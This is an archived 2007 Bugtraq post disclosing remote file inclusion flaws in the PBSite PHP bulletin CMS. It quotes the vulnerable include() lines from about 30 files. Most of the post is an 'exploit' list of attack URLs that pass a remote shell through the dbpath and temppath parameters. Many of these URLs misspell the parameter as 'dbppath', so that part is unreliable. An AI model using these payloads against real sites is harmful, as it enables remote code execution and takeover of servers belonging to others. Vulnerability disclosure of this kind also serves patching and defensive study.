lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY108-F121E5650A5DFFD4EE984CBA92C0@phx.gbl>
Date: Fri, 01 Jun 2007 15:25:22 +0300
From: "pito pito" <the-modest-pirate@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PBSite - PHP Bulletin Site | CMS ====> RFI

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
script:PBSite - PHP Bulletin Site | CMS ====> RFI

url:http://sourceforge.net/project/showfiles.php?group_id=88114

authot:titanichacker (the-modest-pirate@...mail.com)

contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
bug in:   %%%
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./pmpshow.php

include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%
./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php

include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
exploit:%%
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]
%%%%%
http://victim/path/sendpm.php?dbppath=[shell]
%%%%%%%
http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbppath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbppath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%%
http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbppath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%
thanx
%%%%%%%%%
         cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & 
milw0rm & xp10
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ